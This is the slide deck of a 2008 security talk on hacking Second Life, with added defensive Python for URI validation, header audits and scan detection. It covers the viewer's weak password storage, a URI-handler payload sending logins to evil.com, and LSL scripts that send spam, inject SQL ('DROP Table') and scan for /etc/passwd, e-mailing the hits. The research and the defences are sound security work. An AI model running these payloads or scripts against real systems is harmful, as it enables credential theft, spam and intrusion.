#whoami


ERNW 



Living Security. 


Head of Research & Chief Security Officer, ERNW GmbH 

Talks and Publications: 

■ “Hacking SecondLife”, Hack-in-the-Box, Dubai 2008 

■ “Reversing - A structured approach”, RSA Conference San Francisco 2008 

■ “Hacking SecondLife”, Blackhat Europe, Amsterdam 2008 

■ “Hacking the Cisco NAC Framework”, Sector, Toronto, November 2007 

■ “Hacking SecondLife”, Daycon, Dayton 2007 

■ “Hacking Cisco NAC”, Hack-in-the-Box, Kuala Lumpur, 2007 

■ “NAC@ACK”, Blackhat-USA, Las Vegas, 2007 

■ “NAC@ACK”, Blackhat-Europe, Amsterdam, 2007 

■ “More IT-Security through PenTests”, Book published by Vieweg 2005 

■ What I like to do 

■ Breaking things ;-) and all that hacking ninjitsu 

■ Diving (you would be surprised what kind of IT-Security lessons you can learn 
from diving) 

Contact Details: 

■ Email: mthumann@ernw.de / Web: http://www.ernw.de 
■ Part 1 - Why to hack Online Games

■ Part 2 - SecondLife™ Architecture 

■ Part 3 - Hacking the Game 

■ Part 4 - Attacks from the Virtual World 

■ Part 5 - Showtime 
Part 1 - Why to hack Online Games

Why to hack Online Games


■ Cheating is much easier than spending a long time reaching
the next level, earning points, money or whatever

■ Because watching TV or hacking yet another web server is
boring

■ It’s fun playing games and breaking them 

■ To show that we can do it 

■ Because there are marketplaces where you make real 
money out of it and I would like to be rich *justkidding* 

■ And to improve security, because the threats are real and
exploiting online games is becoming more common





Why SecondLife™ ? 
■ Many people are playing SecondLife™

■ There’s a scripting language in SecondLife™: do you
know LSL (Linden Scripting Language)?

■ Because you can attack real world systems out of the 
virtual world 

■ Identity Theft looks sooo pretty easy in SecondLife™ 

■ Identity Theft gives you all their Linden Dollars 

■ Current exchange rate: L$ 230 = US$ 1 :-)







Part 2 - SecondLife™ Architecture 
SecondLife™ Components


■ Login Server: Handles authentication, determines login 
region and finds corresponding Simulator 


■ User Server: Handles instant messaging sessions 


■ Data Server: Handles connections to the central database, 
log database, inventory database and search database 

■ Space Server: Handles routing of messages based on grid 
locations. Simulators register here and get information 
about their neighbors 





SecondLife™ Components 


■ Central Database: Inventory, Billing etc. 

■ Simulator: Each simulator process simulates one 256x256 
meter region of the virtual world 

■ Grid: The virtual world based on simulators 

■ Viewer: The Game Client 

■ Avatar: Your Second Life Character 
Part 3 - Hacking the Game

Threat Analysis with STRIDE


■ Spoofing Identity 

■ Tampering with Data 

■ Repudiation 

■ Information Disclosure 

■ Denial of Service 

■ Elevation of Privileges 
Interesting Points of Attack

[Diagram: Data Server, User Server and Space Server, each backed by a Central DB Server, with the numbered points of attack 1 to 3 marked]





Threat Analysis with STRIDE 
1. Spoofing Identity (Identity Theft) / Tampering with Data
(Cheating)

2. Spoofing Identity (Identity Theft)

3. Repudiation (Billing) / Tampering with Data (increase your
L$)
The Viewer

■ Let’s focus on the viewer, because attacking Linden Lab’s
systems is illegal :-)

■ Luckily the source is available (the viewer is Open
Source), so we can find out how the stuff works

■ And we can modify everything we want and build our own
client :-)

■ So what can we do: Identity Theft and Cheating 
The Viewer - Identity Theft

■ We need Username and Password

■ You can find everything you want in “\Documents and 
Settings\<WinUser>\Application Data\SecondLife” 

■ There’s a directory named “firstname_lastname” of your 
SL account 

■ If the password is saved, you can find it in the 
subdirectory “user_settings” in the file “password.dat” 

■ ... and you need the MAC address of the victim system
too (you still remember commands like “ipconfig /all” and
how to enter them at a command line :-) ?)





Password Encryption 
Password Cracking

■ The Viewer uses standard MD5

■ The MD5 Hash is xored with the MAC Address

■ Time to build a SL password cracker?

■ Or just use tools like md5crack or mdcrack :-)
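The following Python model is added here to show why the scheme on this slide gives no real protection; it is not the viewer's code, and the exact byte layout (the 16-byte MD5 digest XORed with the 6-byte MAC repeated) is an assumption, since the slide only says that the hash is XORed with the MAC address. The point for a defender: XOR is its own inverse, the "key" is information anyone on the machine or the local segment can read, and what falls out is the MD5 hash, which the news report on the next slide says is itself accepted for login.

```python
import hashlib
from itertools import cycle

# Model of the scheme described on the slide: MD5(password) XOR MAC.
# The byte layout below (digest XORed with the MAC repeated) is an
# assumption made for this illustration, not the viewer's own format.


def mac_bytes(mac: str) -> bytes:
    """Parse 'AA:BB:CC:DD:EE:FF' (or dash-separated) into 6 raw bytes."""
    octets = mac.replace("-", ":").split(":")
    if len(octets) != 6:
        raise ValueError("a MAC address has six octets")
    return bytes(int(o, 16) for o in octets)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is an involution: applying the
    same key twice returns the original bytes, so this is both the
    'encrypt' and the 'decrypt' step."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def protect(password: str, mac: str) -> bytes:
    """What this scheme writes to disk: MD5(password) XOR MAC."""
    digest = hashlib.md5(password.encode("utf-8")).digest()
    return xor_with_key(digest, mac_bytes(mac))


def unprotect(stored: bytes, mac: str) -> str:
    """Anyone holding the file plus the machine's MAC gets the MD5 back.
    The MAC is not a secret: 'ipconfig /all' prints it and every host on
    the same segment sees it in the Ethernet header."""
    return xor_with_key(stored, mac_bytes(mac)).hex()


if __name__ == "__main__":
    # Constructed demo values, not taken from any real installation.
    mac = "00:11:22:33:44:55"
    blob = protect("hunter2", mac)
    print("on disk      :", blob.hex())
    print("recovered MD5:", unprotect(blob, mac))
    print("matches MD5(hunter2):",
          unprotect(blob, mac) == hashlib.md5(b"hunter2").hexdigest())
```

A wrong MAC yields a different 16-byte string, but the attacker is not guessing: the MAC is read off the same machine the file was copied from. The fix is not a stronger XOR key but not storing a password-equivalent value under a key derived from public host data at all (an OS credential store, or a short-lived token that is not the login credential).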
Vulnerabilities in SecondLife™


News

Report of 18.09.2007 16:16

Security hole in Second Life client

Security blogger Petko Petkov has reported a vulnerability in the Second Life online gaming client. Attackers can
apparently exploit it to obtain user login credentials for the gaming site. When installed, the client registers the URI
secondlife://. This URI can then be used to transfer other parameters when the client is launched. When the
following line is embedded in a website, attackers can get the client to send login credentials in an XML form without
being prompted:

<iframe src='secondlife://" --autologin --loginuri "http://evil.com/sl/record-login.php'></iframe>

An XML document transmitted by the Second Life client contains a login name and user password, both of which are
sent as an MD5 hash. The credentials can be recovered by an attacker, for example by using rainbow tables which
are readily available online. But Petkov points out that this process is usually unnecessary. The hash alone generally
suffices to log in at Second Life. He says that the password is only needed to use other Second Life services. Victims
need only visit a specially crafted website or open an HTML e-mail for the attack to succeed. There is no solution
for this vulnerability; un-registering the URI should help, though, as a workaround, and gamers should of course
ensure their Second Life login is completely different from their computer account credentials.

It remains to be seen what real use criminals can make of this login data. Probably the most lucrative option would be
to clean out a victim's virtual Linden dollar account. Currently, 1,000 Linden dollars are worth 3.5 real-world US
dollars. On the other hand, it will probably be difficult to withdraw large amounts because there is a cap on exchanges
depending on how long a user has been playing. At any rate, few players are said to have more than 250,000 Linden
dollars, which only amounts to around UK£430.
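The bug in the report above is a classic of registered URI schemes: the string from the web page reaches the client's command line and the quote-plus-`--autologin --loginuri` trick turns a link into option injection. The Python below is an added example of how a handler should treat such input; it is not the Second Life viewer's code. It assumes the only legitimate link shape is `secondlife://<region name>/<x>/<y>/<z>`, rejects everything else before any of it gets near a process launcher, and builds an argument vector (no shell) from the validated fields only. The option names in `viewer_argv` are hypothetical.

```python
import re
from urllib.parse import unquote

# Assumed legitimate link shape: secondlife://<region name>/<x>/<y>/<z>
_REGION_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ]{0,63}$")
# Characters that let a value escape a quoted argument or reach a shell
_DANGEROUS = set("\"'\\`$&|;<>")


class UnsafeUriError(ValueError):
    """Raised for any secondlife:// link that is not a plain location."""


def parse_slurl(uri: str) -> dict:
    """Validate a secondlife:// link and return its fields as typed values.
    The raw string is never handed on; only the parsed fields are."""
    scheme = "secondlife://"
    if not uri.lower().startswith(scheme):
        raise UnsafeUriError("not a secondlife:// link")
    # Decode percent-escapes first so %22 cannot smuggle a quote past the checks.
    parts = [unquote(p) for p in uri[len(scheme):].split("/") if p]
    for part in parts:
        if part.startswith("-"):
            raise UnsafeUriError("option-like component: " + part)
        if any(ch in _DANGEROUS or (ch.isspace() and ch != " ") for ch in part):
            raise UnsafeUriError("quote or shell metacharacter in link")
    if len(parts) != 4:
        raise UnsafeUriError("expected <region>/<x>/<y>/<z>")
    region, *coords = parts
    if not _REGION_NAME.match(region):
        raise UnsafeUriError("invalid region name")
    try:
        x, y, z = (int(c) for c in coords)
    except ValueError:
        raise UnsafeUriError("coordinates must be integers") from None
    # A region is 256 m square (Part 2); the height bound is an assumption.
    if not (0 <= x <= 256 and 0 <= y <= 256 and 0 <= z <= 4096):
        raise UnsafeUriError("coordinates out of range")
    return {"region": region, "x": x, "y": y, "z": z}


def is_safe_slurl(uri: str) -> bool:
    try:
        parse_slurl(uri)
        return True
    except UnsafeUriError:
        return False


def viewer_argv(uri: str) -> list:
    """Build an argv from validated fields only. Passing a list to the process
    launcher (no shell string) means a region name can never be read as a flag.
    The option names here are hypothetical, not the real viewer's."""
    loc = parse_slurl(uri)
    return ["viewer", "--teleport-region", loc["region"],
            "--teleport-position", "{x},{y},{z}".format(**loc)]


if __name__ == "__main__":
    # The payload from the report above, and a plain location link.
    for link in ('secondlife://" --autologin --loginuri "http://evil.com/sl/record-login.php',
                 "secondlife://Italian%20Life/62/223/21"):
        print(repr(link), "->", "rejected" if not is_safe_slurl(link) else viewer_argv(link))
```

Two design points carry the weight: the allow-list (a location has exactly four fields of known type) does more than the deny-list of characters, and the argv is built from typed fields rather than by re-quoting the original string, so there is no quoting to get wrong.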





Cheating - Main Goals

■ Try to find out where the inventory is located and if you
are able to modify it (change your amount of L$)

■ Find any kind of magic key sequences built in, like typing
“wanttoberich” and getting rich :-) or getting into
“GodMode” (I am Avatar Almighty) that is reserved for
Linden employees

■ Automate stupid and boring things while playing (not
relevant at a first glance, but what about an Avatar that
automatically builds objects in a sandbox area and then
tries to sell them to other people?)





Cheating - What to do

■ Reverse engineer the game client (but why, we have the
source code :-))

■ Look at different memory locations for interesting Data 

■ Sniff the network traffic 

■ Modify the Game Client to fit your needs (add some nice 
logging capabilities for example) 

■ Attack the game environment (illegal !!!) 





Cheating - Memory 
Cheating - Sniffing

The Viewer - 1st Conclusion

■ I don’t say that SL is secure!!!

■ At least the developers spend some of their time auditing
the source code automatically with the tool flawfinder

■ The password, if saved, is encrypted with a “key” from 
the user system 

■ Important Data is stored in the Central Database and not 
on the viewer system, so it’s not subject to tampering 

■ Security Patching of the viewer is enforced by Linden 
Labs (that kicked my password stealing demo, sorry 
guys) 

■ I have seen worse things 





Security@LindenLabs 


■ The environment uses Apache and Squid on Debian 
Linux (sounds good, if you still believe that Linux is 
secure) 

■ Reverse proxy concepts are used 

■ Login is done via HTTPS 
Environment

https://66.150.244.178/favicon.ico

GET /favicon.ico HTTP/1.0
Host: 66.150.244.178
...
Connection: keep-alive

HTTP/1.x 404 Not Found
Date: Sat, 13 Oct 2007 03:28:32 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) mod_auth_kerb/5.0-rc6 DAV/2 SVN/1.4.2 mod_jk2/2.0.4 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_perl/1.999.21 Perl/v5.8.4
...
X-Cache: MISS from login7.agni.lindenlab.com
X-Cache-Lookup: MISS from login7.agni.lindenlab.com:80
Via: 1.0 login7.agni.lindenlab.com:80 (squid/2.6.STABLE12)





Does this server look secure? 
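What the dump above gives away can be measured rather than eyeballed. The Python below is an added header-hygiene check, not part of the talk, of the kind an operator runs against their own servers: it parses a raw response head, pulls every name/version token out of the banner headers and every backend hostname out of the cache and proxy headers, and lists them. The sample response is constructed from the dump on this slide, not a fresh capture.

```python
import re

# Constructed sample modelled on the response dump above (not a fresh capture);
# the hostnames and versions are the ones visible on the slide.
SAMPLE_RESPONSE = (
    "HTTP/1.x 404 Not Found\r\n"
    "Date: Sat, 13 Oct 2007 03:28:32 GMT\r\n"
    "Server: Apache/2.0.54 (Debian GNU/Linux) mod_auth_kerb/5.0-rc6 DAV/2 "
    "SVN/1.4.2 mod_jk2/2.0.4 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_perl/1.999.21 "
    "Perl/v5.8.4\r\n"
    "X-Cache: MISS from login7.agni.lindenlab.com\r\n"
    "X-Cache-Lookup: MISS from login7.agni.lindenlab.com:80\r\n"
    "Via: 1.0 login7.agni.lindenlab.com:80 (squid/2.6.STABLE12)\r\n"
    "\r\n"
)

# name/version tokens such as "OpenSSL/0.9.7e" or "Perl/v5.8.4"
_COMPONENT = re.compile(r"([A-Za-z_][\w.-]*)/v?(\d[\w.-]*)")
# dotted host names such as "login7.agni.lindenlab.com"
_HOSTNAME = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)

# headers that commonly carry software banners / topology details
_BANNER_HEADERS = ("server", "via", "x-powered-by")
_TOPOLOGY_HEADERS = ("via", "x-cache", "x-cache-lookup")


def parse_headers(raw: str) -> dict:
    """Split a raw HTTP response head into a {lower-case name: value} dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.splitlines()[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(raw: str) -> dict:
    """Report what a response head discloses about the stack behind it:
    every component with a version, and every backend host name."""
    headers = parse_headers(raw)
    components, hosts = [], set()
    for name in _BANNER_HEADERS:
        for comp, ver in _COMPONENT.findall(headers.get(name, "")):
            components.append(f"{comp} {ver}")
    for name in _TOPOLOGY_HEADERS:
        hosts.update(_HOSTNAME.findall(headers.get(name, "")))
    return {"components": components, "backend_hosts": sorted(hosts)}


if __name__ == "__main__":
    report = audit_headers(SAMPLE_RESPONSE)
    for c in report["components"]:
        print("version disclosed:", c)
    for h in report["backend_hosts"]:
        print("backend host disclosed:", h)
```

On the sample this lists ten versioned components (Apache, mod_ssl, OpenSSL, mod_perl, Perl, Squid and so on) and one backend host. On Apache, `ServerTokens Prod` collapses the Server line to the product name and `ServerSignature Off` keeps it off error pages; Squid's `via off` drops the Via line. That is hygiene, not hardening: a default installation with the banner hidden is still a default installation, which is the real point of this slide.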
Securityfocus

[Screenshot: SecurityFocus vulnerability search for vendor Linden Research, Inc., title Second Life Viewer, showing one entry:]

Apple QuickTime RTSP Response Header Content-Type Remote Stack Based
Buffer Overflow Vulnerability

2008-03-04

http://www.securityfocus.com/bid/26549






Security@LindenLabs - 2nd Conclusion

■ Communication is secured with SSL 

■ The server installation looks like a default installation 

■ From my point of view the servers are not hardened in 
any way 

■ I couldn’t dig deeper because my “Get out of jail” card
was missing :-)
Part 4 - Attacks from the Virtual World

SecondLife™ Virtual Attacks




■ LSL (Linden Scripting Language) is at hand :-)

■ And there are lots of interesting functions from an
attacker’s point of view

■ What about sending spam? 

■ What about attacking real www servers from the virtual 
world? 

■ What about complex hacker tools developed in LSL? 





LSL Functions 


■ llEmail(recipient, subject, message)

■ llHTTPRequest(url, parameters, body)

■ llLoadURL(avatar_id, message, url)

■ And there are even XML-RPC Functions that can 
communicate with the outside world 



Hacking SecondLife™ by Michael Thumann, 4/21/08
Sending Spam

■ Create a text file with email addresses on a web server that
you own :-)

■ Download the file with LSL llHTTPRequest within SL and
parse the response

■ Send spam to each email address
Sending Spam - Example Script

    // Globals the slide does not show; the URL is a placeholder for the
    // web server the previous bullets refer to.
    string URL = "http://example.invalid";
    key http_request_id;
    list my_list;
    integer i;

    default
    {
        state_entry()
        {
            // Fetch the address list; the answer arrives in http_response()
            http_request_id = llHTTPRequest(URL + "/sldemo.txt", [HTTP_METHOD, "GET"], "");
        }

        touch_start(integer total_number)
        {
            for (; i < llGetListLength(my_list); ++i)
            {
                llEmail(llList2String(my_list, i), "SL Spam", "Mine is longer than yours");
            }
        }

        http_response(key request_id, integer status, list metadata, string body)
        {
            if (request_id == http_request_id)
            {
                // one address per ';'-separated field
                my_list = llParseString2List(body, [";"], []);
            }
        }
    }











Attacking real www server 
■ Ok, we can send HTTP Requests :-)

■ So there’s SQL Injection 

■ ... and Cross Site Scripting 

■ ... and Web Defacement with HTTP PUT 

■ You can do almost everything 
SQL Injection in Query String

    // Globals the slide does not show; the URL is a placeholder for the
    // demo target, not a real host.
    string URL = "http://example.invalid";
    key http_request_id;

    default
    {
        state_entry()
        {
            http_request_id = llHTTPRequest(URL + "/sldemo.aspx?user=sldemo';DROP Table;--", [HTTP_METHOD, "GET"], "");
        }

        touch_start(integer total_number)
        {
            llSay(0, "You're owned!");
        }

        http_response(key request_id, integer status, list metadata, string body)
        {
        }
    }










Hacker Tools 
■ You can build complex hacker tools with LSL

■ Think of a web scanner like nikto built with LSL, emailing
all the findings to an anonymous email account

■ Let’s call it slikto :-)







Slikto 0.1 Beta :-)

    // Globals the slide does not show; the URL is a placeholder for the
    // demo target, not a real host.
    string URL = "http://example.invalid";
    list scanlist = ["/index.html", "/sl.html", "/login.html", "/etc/passwd", "/etc/sshd.conf", "/var/log/syslog"];
    list resp_id = [];
    integer max = 6;   // number of entries in scanlist
    integer i;
    integer j;
    key http_request_id;

    default
    {
        state_entry()
        {
            // one request per entry; remember the request keys so the
            // responses can be matched back to the path
            for (; i < max; i++)
            {
                http_request_id = llHTTPRequest(URL + llList2String(scanlist, i), [HTTP_METHOD, "GET"], "test");
                resp_id += [http_request_id];
            }
        }

        http_response(key request_id, integer status, list metadata, string body)
        {
            for (j = 0; j < max; j++)
            {
                if (request_id == llList2Key(resp_id, j))
                {
                    if (status == 200)
                    {
                        llEmail("mlthumann@ids-guide.de", "FOUND!", llList2String(scanlist, j));
                    }
                }
            }
        }
    }
Slikto 0.1 Beta :-)


■ I know, Slikto needs some improvements, but hey guys, 
it’s beta software 

■ Use IIHTTPRequest to download a database from a web 
server containing all tests 

■ Or even better: Download one check, so we’re prepared for 
a distributed scanner 

■ Implement more reliable checks of the results (think of
customized error pages), like parsing the body of the
response

■ Ok, here’s version 0.2 beta :-)
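Seen from the web server on the receiving end, requests from Slikto (and from the spam and SQL injection scripts earlier in this part) are not anonymous: the simulator stamps every llHTTPRequest call with X-SecondLife-* request headers that name the object, its owner and the region (these headers are documented on the LSL wiki; the slides do not mention them). The Python below is an added detection example, not part of the talk. It attributes in-world requests by owner key, and flags any owner whose objects probe several of the sensitive paths from the scan list above. All keys, names, regions and requests are constructed sample data.

```python
from collections import defaultdict

# Paths that a legitimate in-world object (a vendor board, a visitor counter)
# has no reason to request; the first three come from the scanlist above.
SENSITIVE_PREFIXES = ("/etc/", "/var/log/", "/login", "/admin", "/cgi-bin/")

SCANNER_OWNER = "11111111-1111-1111-1111-111111111111"   # made-up avatar key
VENDOR_OWNER = "22222222-2222-2222-2222-222222222222"    # made-up avatar key


def _lsl_headers(owner_key: str, owner_name: str, obj: str, region: str) -> dict:
    """Headers as the simulator adds them to an outbound script request
    (constructed values; the header names are the documented ones)."""
    return {
        "X-SecondLife-Shard": "Production",
        "X-SecondLife-Owner-Key": owner_key,
        "X-SecondLife-Owner-Name": owner_name,
        "X-SecondLife-Object-Name": obj,
        "X-SecondLife-Region": region,
    }


_SCANNER = _lsl_headers(SCANNER_OWNER, "Demo Resident", "Slikto", "Sandbox (128, 128)")
_VENDOR = _lsl_headers(VENDOR_OWNER, "Vendor Resident", "Price Board", "Italian Life (62, 223)")

# Constructed access records: path, status and the request headers seen.
SAMPLE_REQUESTS = [
    {"path": "/index.html", "status": 200, "headers": _SCANNER},
    {"path": "/sl.html", "status": 404, "headers": _SCANNER},
    {"path": "/login.html", "status": 200, "headers": _SCANNER},
    {"path": "/etc/passwd", "status": 404, "headers": _SCANNER},
    {"path": "/etc/sshd.conf", "status": 404, "headers": _SCANNER},
    {"path": "/var/log/syslog", "status": 404, "headers": _SCANNER},
    {"path": "/shop/prices.txt", "status": 200, "headers": _VENDOR},
    # an ordinary browser probing the same path: no in-world attribution
    {"path": "/etc/passwd", "status": 404, "headers": {"User-Agent": "Mozilla/5.0"}},
]


def is_lsl_request(headers: dict) -> bool:
    """A request relayed by a simulator carries the owner key header."""
    return "X-SecondLife-Owner-Key" in headers


def attribute(headers: dict) -> dict:
    """Pull the fields an abuse report to the grid operator would need."""
    return {
        "owner_key": headers.get("X-SecondLife-Owner-Key"),
        "owner_name": headers.get("X-SecondLife-Owner-Name"),
        "object_name": headers.get("X-SecondLife-Object-Name"),
        "region": headers.get("X-SecondLife-Region"),
        "shard": headers.get("X-SecondLife-Shard"),
    }


def scan_report(requests: list, threshold: int = 3) -> dict:
    """Group in-world requests by owner key and return the owners whose
    objects probed at least `threshold` distinct sensitive paths."""
    by_owner = defaultdict(lambda: {"who": None, "probes": set()})
    for req in requests:
        headers = req["headers"]
        if not is_lsl_request(headers):
            continue
        entry = by_owner[headers["X-SecondLife-Owner-Key"]]
        entry["who"] = attribute(headers)
        if req["path"].startswith(SENSITIVE_PREFIXES):
            entry["probes"].add(req["path"])
    return {
        key: {"who": e["who"], "probes": sorted(e["probes"])}
        for key, e in by_owner.items()
        if len(e["probes"]) >= threshold
    }


if __name__ == "__main__":
    for key, hit in scan_report(SAMPLE_REQUESTS).items():
        who = hit["who"]
        print(f"{who['owner_name']} ({key}) via object '{who['object_name']}' "
              f"in {who['region']}: {hit['probes']}")
```

The headers are set by the simulator, not by the script, so the script's author cannot forge them; what the script author can do is run the object under a throwaway avatar, which is why the owner key is evidence for an abuse report rather than a name. Status codes are deliberately ignored in the grouping: a scanner that is checking "more reliable" things than a 200 still has to request the path.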


[Screenshot: Second Life viewer window, region “Italian Life” (62, 223, 21), balance L$0]


SecondLife™ Virtual Attacks 

■ And there’s even more 

■ Phishing attacks 

■ Changing the appearance of
your avatar (on my 1st visit to
SecondLife™ I touched
everything *bg* and looked like a
monster afterwards)
Realistic Attacks?

■ Every Object and Script has an owner and a creator that
can be tracked

■ Avatars are for free and do you think these people are
using their real names? I don’t :-) !

■ There are Sandbox Areas where you can build objects,
develop scripts and find other people that are curious and
touch everything, but Sandboxes are cleaned after 5 hours
(and I was banned from my favorite Sandbox after the last
demo :-))

■ Do you remember the automated Avatar, selling objects
with scripts attached :-) ?

■ In Real life we call that bots 
Realistic Attacks?

■ Other security researchers are also working on SL hacks

■ Charles Miller presented on the mentioned
QuickTime vulnerability last month, using shellcode to
control the SL Viewer and steal money from every
avatar within a range of about 200 feet of a malicious
object


Some more ideas about attacks

■ Build more tools like Port Scanners and Fuzzers

■ What about spying after identity theft of a manager’s
business avatar?

■ Or using our LSL Hacker tools to attack the Linden Lab 
infrastructure (remember that the mentioned attacks were 
originated from their systems)? I don’t think that a firewall 
is protecting their systems from each other. I hope that I’m 
wrong! 





Final Conclusion 
■ Exploiting Online Games is becoming more common and SL is
just an example

■ There’s a really big WoW Community, and Online
Gambling like Poker also gets more and more attention

■ Online Games are about making money, so that’s a
growing marketplace, and where money is made you also
find cheaters, criminals and hackers

■ Especially Virtual Worlds offer a lot of serious attack
vectors

■ Hacking Games is NOT just fun, I think it will also become
a new field of customers for Security Professionals, so
take this talk a little bit more seriously





Further reading

“Exploiting Online Games” (book by Greg Hoglund and Gary McGraw)

Thanks to Greg for some
inspiration and for signing
my personal copy :-)

Thanks for your patience


Time left for 'questions & answers' ? 

You can always drop me a note at: 
mthumann@ernw.de 





